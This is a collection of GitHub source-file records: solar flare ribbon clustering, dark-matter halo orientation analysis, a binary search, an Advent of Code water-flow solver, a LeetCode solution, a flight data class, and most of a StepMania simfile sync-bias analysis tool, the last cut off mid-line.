interp_spec.reshape((interp_spec.shape[0],-1)).T # this reshapes into a (n_samples, n_features) shape array where the number of samples is equal to the number of pixels and the number of features is the number of interpolated wavelength points\n\n standard_spectra = StandardScaler().fit_transform(spectra)\n\n labels = model.predict(standard_spectra).reshape((data.shape[-2], data.shape[-1]))\n\n return labels\n\ndef kmeans_ribbons(labels, ribb_clust=0):\n \"\"\"\n A function that takes the labels output by the trained KMeans and returns an array that contains 1 in the locations of the flare ribbons and 0 elsewhere.\n\n Parameters\n ----------\n labels : numpy.ndarray\n The cluster labels from the result of the trained KMeans clustering the data.\n ribb_clust : int, optional\n Which cluster in the trained KMeans model represents the flare ribbon class. Default is 0.\n\n Returns\n -------\n ribbon_labels : numpy.ndarray\n An array containing 1s where the flare ribbons have been identified by the KMeans model and 0 elsewhere.\n \"\"\"\n ribbon_labels = np.zeros_like(labels.flatten())\n\n ribbon_labels[np.where(labels.flatten() == ribb_clust)] = 1\n\n return ribbon_labels.reshape(labels.shape)\n\ndef dbscan_ribbons(ribbon_labels, min_samples=100, eps=0.1, metric=\"euclidean\"):\n \"\"\"\n A function to perform the DBSCAN on the flare ribbon locations to eliminate noise and locate exactly where flare ribbons are (and separation of multiple flare ribbons).\n\n NOTE: DBSCAN is deterministic. There is no trained model because it does not do predictions, it performs the DBSCAN algorithm for each data it sees. This can lead to different optimal DBSCAN parameters for different datasets but it is likely that for a single flare the same DBSCAN parameters should work for all data. tl;dr flares are slightly sensible.\n\n Parameters\n ----------\n ribbon_labels : numpy.ndarray\n An array containing 1s where the flare ribbons have been located by the KMeans model and 0 elsewhere.\n min_samples : int\n The `min_samples` DBSCAN parameter. Default is 100.\n eps : float\n The `eps` DBSCAN parameter. Default is 0.1.\n\n Returns\n -------\n dbribs_img : numpy.ndarray\n An array containing each KMeans-identified flare spectra with its associated DBSCAN cluster label in its rightful spatial location. Points that were not clustered by DBSCAN are represented by NaNs.\n \"\"\"\n dbscan = DBSCAN(min_samples=min_samples, eps=eps, metric=metric)\n\n db_ribbons = []\n flat_ribbs = ribbon_labels.flatten()\n for j in tqdm(range(flat_ribbs.shape[0])):\n if flat_ribbs[j] == 1:\n db_ribbons.append([j % ribbon_labels.shape[-1], j // ribbon_labels.shape[-1], flat_ribbs[j]])\n db_ribbons = np.array(db_ribbons)\n print(db_ribbons.shape)\n\n ss_dbribbons = StandardScaler().fit_transform(db_ribbons)\n db_labels = dbscan.fit_predict(ss_dbribbons)\n\n dbribs_img = np.zeros((ribbon_labels.shape[-2], ribbon_labels.shape[-1]))\n for j in tqdm(range(dbribs_img.shape[-2])):\n for i in range(dbribs_img.shape[-1]):\n try:\n idx = np.where((db_ribbons[:,0] == i) & (db_ribbons[:,1] == j))[0][0]\n dbribs_img[j,i] = db_labels[idx]\n except IndexError:\n dbribs_img[j,i] = np.nan\n\n return dbribs_img","repo_name":"bionictoucan/flare_asymmetries","sub_path":"ribbon_selection.py","file_name":"ribbon_selection.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38244716129","text":"import os.path as path\nimport orientations as ori\nimport gizmo_analysis as gizmo\nimport numpy as np\nimport pandas as pd\n\nsimulation_list = [\n \"../../../data/m12f_cdm-only\",\n \"../../../data/m12i_cdm-only\",\n \"../../../data/m12m_cdm-only\",\n]\n\ndr = rmin = 2\nrmax = 400 + dr\n\nfor sim in simulation_list:\n\n df = {\"tensors\": [], \"angle\": []}\n\n part = gizmo.io.Read.read_snapshots([\"dark\"], \"redshift\", 0, sim)\n\n positions = part[\"dark\"].prop(\"host.distance\")\n dists = part[\"dark\"].prop(\"host.distance.total\")\n\n t0 = ori.getSymmetryAxes(positions, dists, radius=10)\n host_min_ax = t0[2]\n\n for i in np.arange(rmin, rmax, step=dr):\n tensor = ori.getSymmetryAxes(positions, dists, radius=i)\n angle = ori.getMinAngle(tensor[2], host_min_ax) * 180 / np.pi\n df[\"tensors\"].append(tensor)\n df[\"angle\"].append(angle)\n\n df = pd.DataFrame(df)\n df.to_hdf(f\"orientations_present_day_{path.split(sim)[-1]}.hdf\", key=\"w\")\n","repo_name":"jaybaptista/latte_orientations","sub_path":"orientations_present_day_dmo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42596302298","text":"def binary_search(A, key): # скорость поиска O(log2N)\n left = 0\n right = len(A)\n while left < right:\n middle = (left + right) // 2\n if key > A[middle]:\n left = middle + 1\n else:\n right = middle\n if left != len(A) and A[left] == key:\n return left\n else:\n print('{} is not in sequence'.format(key))\n","repo_name":"AndreyZemskov/Algorithms","sub_path":"arrays/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30552470073","text":"# Determine the number of sand tiles that the water can reach assuming that it is always falling downward\n# and clay blocks flow such that it moves left and right\nfrom collections import deque\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\n\ndef test_data():\n return [\"x=495, y=2..7\",\n \"y=7, x=495..501\",\n \"x=501, y=3..7\",\n \"x=498, y=2..4\",\n \"x=506, y=1..2\",\n \"x=498, y=10..13\",\n \"x=504, y=10..13\",\n \"y=13, x=498..504\"]\n\n\nif __name__ == '__main__':\n print(\"Starting Day 17-1\")\n # Read file into list of values\n values = read_file('input.txt')\n # values = test_data()\n\n # Create the initial grid with all sand\n grid = [['.'] * 1000 for i in range(2000)]\n # Put in the fountain at 500,0\n grid[0][500] = '+'\n\n # Go through each piece of the input and fill in the rows/cols being described as clay\n min_x = 1000\n max_x = 0\n max_y = 0\n for val in values:\n items = val.replace(',', '').split()\n if 'x' in items[0]:\n x = int(items[0][2:])\n if x < min_x:\n min_x = x\n elif x > max_x:\n max_x = x\n start_y, end_y = map(int, items[1][2:].split('..'))\n for y in range(start_y, end_y + 1):\n if y > max_y:\n max_y = y\n grid[y][x] = '#'\n elif 'y' in items[0]:\n y = int(items[0][2:])\n if y > max_y:\n max_y = y\n start_x, end_x = map(int, items[1][2:].split('..'))\n for x in range(start_x, end_x + 1):\n if x < min_x:\n min_x = x\n elif x > max_x:\n max_x = x\n grid[y][x] = '#'\n\n # Need a little buffer here\n min_x -= 5\n max_x += 5\n\n # Debug print out grid\n # for y in range(0, max_y + 2):\n # for x in range(min_x - 1, max_x + 2):\n # print(grid[y][x], end='')\n # print()\n # print(\"Map size is x={0!s}-{1!s}, y=0-{2!s}\".format(min_x, max_x, max_y))\n # print()\n\n\n # Recursion doesn't work here because it goes beyond the limits of what the computer can do, so we\n # need to do it a different way. This time we will use a queue for determining which spots we need\n # to start from. That spot will recurse left and right if necessary, but going up and down will be done\n # via the queue\n queue = deque()\n\n def flow_down(x, y):\n # First, if we are beyond the max, then just stop here\n if x < min_x or x > max_x or y > max_y:\n return True\n\n # Check what the current space is\n space = grid[y][x]\n if space == '.':\n # This is sand, so we need to check the space below for more sand\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # The space below is already water, so it must have been covered by another path\n return True\n else:\n # Space below is not sand, must be clay so try to go left and right\n free_left = flow_left(x - 1, y)\n free_right = flow_right(x + 1, y)\n if free_left or free_right:\n # Either left or right is free, so we just return\n return True\n else:\n # Neither left nor right is free, so we turn them to standing water and put the\n # space above back on the queue\n flow_left(x - 1, y, True)\n flow_right(x + 1, y, True)\n grid[y][x] = '~'\n queue.append((x, y - 1))\n return False\n elif space == '|':\n # This is water, so we have been here already, check space below to see if we are going back\n # up or if this is repeating. If it's wall or standing water below, we want to try left and\n # right, but for sand or water, just ignore\n if grid[y + 1][x] == '.' or grid[y + 1][x] == '|':\n return True\n free_left = flow_left(x - 1, y)\n free_right = flow_right(x + 1, y)\n if free_left or free_right:\n # Either left or right is free, so we just return\n return True\n else:\n # Neither left nor right is free, so we turn them to standing water and put the space\n # above back on the queue\n flow_left(x - 1, y, True)\n flow_right(x + 1, y, True)\n grid[y][x] = '~'\n queue.append((x, y - 1))\n return False\n elif space == '~':\n # This is standing water, so this area has already been processed, try to go back up if\n # possible\n queue.append((x, y - 1))\n return True\n else:\n print(\"We hit a weird state, investigate {0!s},{1!s}\".format(x,y))\n return False\n\n def flow_left(x, y, set_standing=False):\n # Check the space\n space = grid[y][x]\n if space == '#':\n # We hit clay, so return that this is blocked\n return False\n elif space == '|':\n # This is existing water, make it standing if asked, then treat it like a sand spot\n if set_standing:\n grid[y][x] = '~'\n if grid[y + 1][x] == '.':\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n return True\n else:\n return flow_left(x - 1, y, set_standing)\n elif space == '~':\n # Ignore standing water\n return flow_left(x - 1, y)\n elif space == '.':\n # This is sand, so check to see if we can flow down, if yes then add to queue, otherwise\n # continue left\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # Water is already flowing this way, so we are good\n return True\n else:\n return flow_left(x - 1, y)\n\n return False\n\n def flow_right(x, y, set_standing=False):\n # Check the space\n space = grid[y][x]\n if space == '#':\n # We hit clay, so return that this is blocked\n return False\n elif space == '|':\n # This is existing water, make it standing if asked, then treat it like a sand spot\n if set_standing:\n grid[y][x] = '~'\n if grid[y + 1][x] == '.':\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n return True\n else:\n return flow_right(x + 1, y, set_standing)\n elif space == '~':\n # Ignore standing water\n return flow_right(x + 1, y)\n elif space == '.':\n # This is sand, so check to see if we can flow down, if yes then add to queue, otherwise\n # continue left\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # Water is already flowing this way, so we are good\n return True\n else:\n return flow_right(x + 1, y)\n\n return False\n\n # Start the flow of water below the fountain\n queue.append((500, 1))\n count = 0\n while len(queue) > 0:\n count += 1\n # for y in range(72,91):\n # for x in range(490,515):\n # print(grid[y][x], end='')\n # print()\n # print()\n x,y = queue.popleft()\n flow_down(x, y)\n\n # Print out grid again\n for y in range(0, max_y + 2):\n print(\"{0!s:>4}\".format(y), end='')\n for x in range(min_x - 1, max_x + 2):\n print(grid[y][x], end='')\n print()\n\n # Print out answer\n water_tiles = 0\n standing_water_tiles = 0\n for row in grid:\n for cell in row:\n if cell == '|' or cell == '~':\n water_tiles += 1\n if cell == '~':\n standing_water_tiles += 1\n\n print(\"Number of water tiles: {0!s}\".format(water_tiles))\n print(\"Number of standing water tiles: {0!s}\".format(standing_water_tiles))\n","repo_name":"theknoxinator/AoC","sub_path":"2018/Day17/day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":8838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13694920772","text":"class Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n stack = []\n ht = {c:i for i,c in enumerate(s)}\n for i, c in enumerate(s):\n if c in stack:\n continue\n while stack and stack[-1] > c and i < ht[stack[-1]]:\n stack.pop()\n stack.append(c)\n\n return ''.join(stack)","repo_name":"pdkz/leetcode","sub_path":"0316_Remove_Duplicate_Letters/0316_Remove_Duplicate_Letters.py","file_name":"0316_Remove_Duplicate_Letters.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1951037006","text":"class Flights:\n # Default Constructor\n def __init__(self):\n self.start_airport = 'SLC'\n self.end_airport = 'Rome'\n self.date_leave = 'Jul 31'\n self.date_leave_orig = self.date_leave\n self.date_leave_final = self.date_leave\n self.date_return = 'Aug 3'\n self.date_return_orig = self.date_return\n self.price = 1200\n self.duration = 10\n self.flight_type = 'Round Trip'\n self.date_list = []\n self.price_list = []\n self.date_mat = []\n self.dates_length_list = []\n self.dates_length_mat = []\n self.price_mat = []\n self.month_list = []\n self.year_price_mat = [[] for x in range(0, 12)]\n self.flight_ind = 0\n self.num_flights = 1\n\n # Getters\n def get_start_airport(self, nargout):\n if nargout == 1:\n return self.start_airport\n else:\n print(self.start_airport)\n\n def get_end_airport(self, nargout):\n if nargout == 1:\n return self.end_airport\n else:\n print(self.end_airport)\n\n def get_date_leave(self, nargout):\n if nargout == 1:\n return self.date_leave\n else:\n print(self.date_leave)\n\n def get_date_return(self, nargout):\n if nargout == 1:\n return self.date_return\n else:\n print(self.date_return)\n\n def get_price(self, nargout):\n if nargout == 1:\n return str(self.price)\n else:\n print(self.price)\n\n def get_duration(self, nargout):\n if nargout == 1:\n return str(self.duration)\n else:\n print(self.duration)\n\n def get_flight_type(self, nargout):\n if nargout == 1:\n return self.flight_type\n else:\n print(self.flight_type)\n\n def get_flight_info(self):\n print('--------------------------------------')\n print('Flight from ' + self.get_start_airport(1) + ' to ' + self.get_end_airport(1) +\n ' (' + self.get_flight_type(1) + ')')\n print('--------------------------------------')\n print('Departure: ' + self.get_date_leave(1))\n print('Return: ' + self.get_date_return(1))\n print('Price: $' + self.get_price(1))\n print('Duration: ' + self.get_duration(1) + ' hrs')\n\n # Setters\n def set_start_airport(self, new_start_airport):\n self.start_airport = new_start_airport\n\n def set_end_airport(self, new_end_airport):\n self.end_airport = new_end_airport\n\n def set_date_leave(self, new_date_leave):\n self.date_leave = new_date_leave\n\n def set_date_return(self, new_date_return):\n self.date_return = new_date_return\n\n def set_price(self, new_price):\n self.price = new_price\n\n def set_duration(self, new_duration):\n self.duration = new_duration\n\n def set_flight_type(self, new_flight_type):\n self.flight_type = new_flight_type\n\n def set_flight_info(self, new_flight_info):\n # Unpack flight info (new_flight_info is list\n new_start_airport = new_flight_info[0]\n new_end_airport = new_flight_info[1]\n new_date_leave = new_flight_info[2]\n new_date_return = new_flight_info[3]\n new_price = new_flight_info[4]\n new_duration = new_flight_info[5]\n new_flight_type = new_flight_info[6]\n\n # Store flight info in object\n self.set_start_airport(new_start_airport)\n self.set_end_airport(new_end_airport)\n self.set_date_leave(new_date_leave)\n self.set_date_return(new_date_return)\n self.set_price(new_price)\n self.set_duration(new_duration)\n self.set_flight_type(new_flight_type)\n","repo_name":"jjc999/Flight_Scraper","sub_path":"Original_GoogleFlightsScrape/Flights.py","file_name":"Flights.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6883972521","text":"_VERSION = '0.8.1'\n\nfrom collections.abc import Container\nimport csv\nfrom datetime import datetime as dt\nfrom enum import IntEnum\nimport logging\nimport os\nimport re\nimport sys\nimport unicodedata\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import ticker as mticker\nfrom scipy import signal\nfrom pydub import AudioSegment\n\nimport simfile\nfrom simfile.timing import TimingData\nfrom simfile.timing.engine import TimingEngine\n\n_NINEORNULL_NULL = 0\n_NINEORNULL_P9MS = 9\n_CSV_FIELDNAMES = [\n 'path',\n 'slot',\n 'bias',\n 'conf',\n 'interquintile',\n 'stdev',\n 'paradigm',\n 'timestamp',\n 'fingerprint_ms',\n 'window_ms',\n 'step_ms',\n 'kernel_type',\n 'kernel_target',\n 'sample_rate',\n 'title',\n 'titletranslit',\n 'subtitle',\n 'subtitletranslit',\n 'artist',\n 'artisttranslit',\n]\n_PARAMETERS = {\n # Default parameters.\n 'root_path': 'Path to a simfile, pack, or collection of packs to analyze. If not provided, the GUI is invoked instead.',\n 'report_path': 'The destination directory for the sync bias report and audio fingerprint plots. If not provided, defaults to \"/__bias-check\".',\n 'consider_null': 'Consider charts close enough to 0ms bias to be \"correct\" under the null (StepMania) sync paradigm.',\n 'consider_p9ms': 'Consider charts close enough to +9ms bias to be \"correct\" under the In The Groove sync paradigm.',\n 'tolerance': 'If a simfile\\'s sync bias lands within a paradigm ± this tolerance, that counts as \"close enough\".',\n 'confidence_limit': 'If the confidence in a simfile\\'s sync bias is below this value, it will not be considered for unbiasing.',\n 'fingerprint_ms': '[ms] Time margin on either side of the beat to analyze.',\n 'window_ms': '[ms] The spectrogram algorithm\\'s moving window parameter.',\n 'step_ms': '[ms] Controls the spectrogram algorithm\\'s overlap parameter, but expressed as a step size.',\n 'kernel_target': 'Choose whether to convolve with the beat digest (\"digest\") or the spectral accumulator (\"accumulator\").',\n 'kernel_type': 'Choose a kernel that responds to a rising edge (\"rising\") or local loudness (\"loudest\").',\n 'magic_offset_ms': '[ms] Add a constant value to the time of maximum kernel response. I haven\\'t tracked the cause of this down yet. Might be related to attack perception?',\n 'full_spectrogram': 'Analyze the full spectrogram in one go - this will make the program run slower...',\n 'to_paradigm': 'Choose a target paradigm for the pack unbiasing step. This will modify your simfiles!'\n}\n_THEORETICAL_UPPER = 0.83\n_NEARNESS_SCALAR = 10 # milliseconds\n_NEARNESS_OFFSET = 0.5 # milliseconds\n\nclass FloatRange(Container):\n # Endpoint inclusive.\n def __init__(self, lo=None, hi=None):\n self.lo = lo\n self.hi = hi\n\n def __iter__(self):\n return iter([f'>= {self.lo}', f'<= {self.hi}'])\n\n def __contains__(self, value):\n if (self.lo is not None) and (value < self.lo):\n return False\n if (self.hi is not None) and (value > self.hi):\n return False\n return True\n\nclass BiasKernel(IntEnum):\n RISING = 0\n LOUDEST = 1\n\nclass KernelTarget(IntEnum):\n DIGEST = 0\n ACCUMULATOR = 1\n\n\n_PARAM_DEFAULTS = {\n # Default parameters.\n 'root_path': None,\n 'report_path': None,\n 'consider_null': True,\n 'consider_p9ms': True,\n 'tolerance': 3.0,\n 'confidence_limit': 80,\n 'fingerprint_ms': 50,\n 'window_ms': 10,\n 'step_ms': 0.2,\n 'kernel_target': KernelTarget.DIGEST,\n 'kernel_type': BiasKernel.RISING,\n 'magic_offset_ms': 0.0,\n 'full_spectrogram': False,\n 'to_paradigm': None\n}\n\ndef timestamp():\n return dt.utcnow().strftime('%Y%m%d-%H%M%S-%f')[:-3]\n\n\ndef slot_abbreviation(steps_type, chart_slot, chart_index=0, paradigm='null'):\n logging.info(steps_type)\n logging.info(chart_slot)\n if paradigm == '+9ms':\n map_style = {\n 'dance-single': 'S',\n 'dance-double': 'D'\n }\n map_slot = {\n 'Challenge': 'X',\n 'Hard': 'H',\n 'Medium': 'M',\n 'Easy': 'E',\n 'Beginner': 'N',\n 'Edit': '.'\n }\n return map_style.get(steps_type, '?') \\\n + map_slot.get(chart_slot, '?') \\\n + (chart_slot == 'Edit' and f'{chart_index}' or '')\n else: # Charts that don't fit a paradigm are probably DDR charts...no shade but\n map_style = {\n 'dance-single': 'SP',\n 'dance-double': 'DP'\n }\n map_slot = {\n 'Challenge': 'C',\n 'Hard': 'E',\n 'Medium': 'D',\n 'Easy': 'B',\n 'Beginner': 'b',\n 'Edit': 'X'\n }\n return map_slot.get(chart_slot, '?') \\\n + (chart_slot == 'Edit' and f'{chart_index}' or '') \\\n + map_style.get(steps_type, '?')\n\n\ndef slot_expansion(abbr):\n if abbr[-2:] in ['SP', 'DP']:\n map_style = {\n 'SP': 'dance-single',\n 'DP': 'dance-double'\n }\n map_slot = {\n 'C': 'Challenge',\n 'E': 'Hard',\n 'D': 'Medium',\n 'B': 'Easy',\n 'b': 'Beginner',\n 'X': 'Edit'\n }\n steps_type = map_style[abbr[-2:]]\n chart_slot = map_slot[abbr[0]]\n if len(abbr) > 3:\n chart_index = int(abbr[1:-2])\n else:\n chart_index = None\n elif abbr[0] in ['S', 'D']:\n map_style = {\n 'S': 'dance-single',\n 'D': 'dance-double'\n }\n map_slot = {\n 'X': 'Challenge',\n 'H': 'Hard',\n 'M': 'Medium',\n 'E': 'Easy',\n 'N': 'Beginner',\n '.': 'Edit'\n }\n steps_type = map_style[abbr[0]]\n chart_slot = map_slot[abbr[1]]\n if len(abbr) > 2:\n chart_index = int(abbr[2:])\n else:\n chart_index = None\n else:\n raise Exception(f'Couldn\\'t deduce meaning of slot abbreviation \"{abbr}\"')\n\n return steps_type, chart_slot, chart_index\n\n\ndef slugify(value, allow_unicode=False):\n \"\"\"\n https://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename\n Taken from https://github.com/django/django/blob/master/django/utils/text.py\n Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated\n dashes to single dashes. Remove characters that aren't alphanumerics,\n underscores, or hyphens. Convert to lowercase. Also strip leading and\n trailing whitespace, dashes, and underscores.\n \"\"\"\n value = str(value)\n if allow_unicode:\n value = unicodedata.normalize('NFKC', value)\n else:\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')\n value = re.sub(r'[^\\w\\s-]', '', value)\n return re.sub(r'[-\\s]+', '-', value).strip('-_')\n\n\ndef timedelta_as_hhmmss(delta):\n total_sec = int(delta.total_seconds())\n h = total_sec // 3600\n m = (total_sec % 3600) // 60\n s = (total_sec % 60)\n return f'{h:02d}:{m:02d}:{s:02d}'\n\n\ndef guess_paradigm(sync_bias_ms, tolerance=3, consider_null=True, consider_p9ms=True, short_paradigm=True, **kwargs):\n if consider_null and (sync_bias_ms > _NINEORNULL_NULL - tolerance and sync_bias_ms < _NINEORNULL_NULL + tolerance):\n return short_paradigm and 'null' or 'probably null'\n elif consider_p9ms and (sync_bias_ms > _NINEORNULL_P9MS - tolerance and sync_bias_ms < _NINEORNULL_P9MS + tolerance):\n return short_paradigm and '+9ms' or 'probably +9ms'\n else:\n return short_paradigm and '????' or 'unclear paradigm'\n\n\ndef plot_fingerprint(fingerprint, target_axes, **kwargs):\n # Set up visuals to show the user what's going on.\n times_ms = fingerprint['time_values']\n frequencies_kHz = fingerprint['frequencies']\n acc = fingerprint['freq_domain']\n digest = fingerprint['beat_digest']\n beat_indices = fingerprint['beat_indices']\n sync_bias = fingerprint['bias_result']\n post_kernel_flat = fingerprint['convolution']\n post_kernel = fingerprint['post_kernel']\n plot_title = fingerprint['plots_title']\n fingerprint_ms = kwargs.get('fingerprint_ms', 50)\n magic_offset_ms = kwargs.get('magic_offset_ms', 0.0)\n kernel_target = kwargs.get('kernel_target', KernelTarget.DIGEST)\n hide_yticks = kwargs.get('hide_yticks', False)\n\n edge_discard = 5 # TODO: pull in from calling function I guess\n if beat_indices is None:\n beat_indices = np.arange(digest.shape[0])\n\n time_ticks = np.hstack((\n np.arange(0, times_ms[ 0]-1, -10),\n np.arange(0, times_ms[-1]+1, 10)\n ))\n frequency_line = np.ones(np.shape(frequencies_kHz)) * sync_bias\n beatindex_line = np.ones(np.shape(digest)[0]) * sync_bias\n post_kernel_over_freq = np.interp(\n post_kernel_flat,\n (\n post_kernel_flat[edge_discard:-edge_discard].min(),\n post_kernel_flat[edge_discard:-edge_discard].max()\n ),\n (\n frequencies_kHz.min() * 0.9 + frequencies_kHz.max() * 0.1,\n frequencies_kHz.min() * 0.1 + frequencies_kHz.max() * 0.9\n ))\n post_kernel_over_beat = np.interp(\n post_kernel_flat,\n (\n post_kernel_flat[edge_discard:-edge_discard].min(),\n post_kernel_flat[edge_discard:-edge_discard].max()\n ),\n (\n beat_indices.min() * 0.9 + beat_indices.max() * 0.1,\n beat_indices.min() * 0.1 + beat_indices.max() * 0.9\n ))\n\n # Accumulator in frequency domain\n ax = target_axes[0]\n ax.clear()\n pcm = ax.pcolormesh(times_ms, frequencies_kHz, acc)\n ax.set_ylabel('Frequency [kHz]')\n ax.set_xlabel('Time [msec]', labelpad=-12)\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_freq, 'w-')\n ax.plot(frequency_line, frequencies_kHz, 'r-')\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early \\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n # Digest in beat domain\n ax = target_axes[1]\n ax.clear()\n pcm = ax.pcolormesh(times_ms, beat_indices, digest)\n pcm.set_clim(np.percentile(digest[:], 10), np.percentile(digest[:], 90))\n ax.set_ylabel('Beat Index')\n ax.set_xlabel('Time [msec]', labelpad=-12)\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_beat, 'w-')\n ax.plot(beatindex_line, beat_indices, 'r-')\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early \\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n # Post-convolution plot\n ax = target_axes[2]\n ax.clear()\n if kernel_target == KernelTarget.ACCUMULATOR:\n pcm = ax.pcolormesh(times_ms, frequencies_kHz, post_kernel)\n ax.set_ylabel('Frequency [kHz]')\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_freq, 'w-')\n ax.plot(frequency_line, frequencies_kHz, 'r-')\n else: # kernel_target == KernelTarget.DIGEST\n pcm = ax.pcolormesh(times_ms, beat_indices, post_kernel)\n ax.set_ylabel('Beat Index')\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_beat, 'w-')\n ax.plot(beatindex_line, beat_indices, 'r-')\n pcm.set_clim(np.percentile(post_kernel[:], 3), np.percentile(post_kernel[:], 97))\n ax.set_xlabel('Time [msec]', labelpad=-12)\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early \\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n\ndef get_full_title(base_simfile):\n simfile_artist = base_simfile.artisttranslit or base_simfile.artist\n simfile_title = base_simfile.titletranslit or base_simfile.title\n simfile_subtitle = base_simfile.subtitletranslit or base_simfile.subtitle\n return f'{simfile_title}{simfile_subtitle and (\" \" + simfile_subtitle) or \"\"}'\n\n\ndef find_music(simfile_dir, music_filename):\n if (music_filename is None) or (len(music_filename) == 0):\n # Any info whatsoever about the music filename?\n music_stem = ''\n else:\n if os.path.isfile(os.path.join(simfile_dir, music_filename)):\n # Already know which music file is being used.\n return music_filename\n\n # Let's at least look for a matching filename stem.\n music_stem = os.path.splitext(os.path.split(music_filename)[1])[0]\n \n files = os.listdir(simfile_dir)\n # StepMania supports MP3, WAV, OGA, and OGG\n # Project OutFox community might use Opus or FLAC\n music_options = [f for f in files if os.path.splitext(f)[1] in ['.wav', '.mp3', '.oga', '.ogg', '.opus', '.flac']]\n if music_stem == '':\n # Any audio file will be accepted here.\n music_options_fn = music_options\n else:\n # Only audio files that match the presumed stem are accepted.\n music_options_fn = [f for f in music_options if os.path.splitext(f)[0].lower() == music_stem.lower()]\n \n if len(music_options_fn) != 1:\n # Last-ditch effort. Any music files, even if they don't match the filename??\n music_options_fn = music_options\n\n if len(music_options_fn) == 0:\n # No audio...\n raise FileNotFoundError(f'No audio file matching {music_filename}')\n elif len(music_options_fn) > 1:\n # Too many audio...\n raise FileNotFoundError(f'Too many audio files matching {music_filename}')\n\n music_found = music_options_fn[0]\n logging.info(f\"Simfile/chart audio substitution: {(music_filename is None) and '' or music_filename} --> {music_found}\")\n return music_found\n\n\ndef check_sync_bias(simfile_dir, base_simfile, chart_index=None, report_path=None, save_plots=True, show_intermediate_plots=False, **kwargs):\n fingerprint = {\n 'beat_digest': None, # Beat digest fingerprint (beat index vs. time)\n 'beat_indices': None, # Beat indices that contributed to the digest\n 'freq_domain': None, # Accumulation in frequency domain (frequency vs. time)\n 'post_kernel': None, # Post-kernel\n 'bias_result': None, # Scalar value result of the bias analysis\n 'convolution': None, # 1-D plot of the convolution response (where the time at max determines the bias)\n 'time_values': None, # x-axis\n 'frequencies': None, # y-axis (for frequencies)\n 'plots_title': None, # title used for the plot (contains simfile info, bias, etc.)\n 'files_title': None # title stem used for saving plots to files\n }\n\n kernel_type = kwargs.get('kernel_type', BiasKernel.RISING)\n kernel_target = kwargs.get('kernel_target', KernelTarget.DIGEST)\n magic_offset_ms = kwargs.get('magic_offset_ms', 0.0) # Why though\n full_spectrogram = kwargs.get('full_spectrogram', False)\n\n simfile_artist = base_simfile.artisttranslit or base_simfile.artist\n simfile_title = base_simfile.titletranslit or 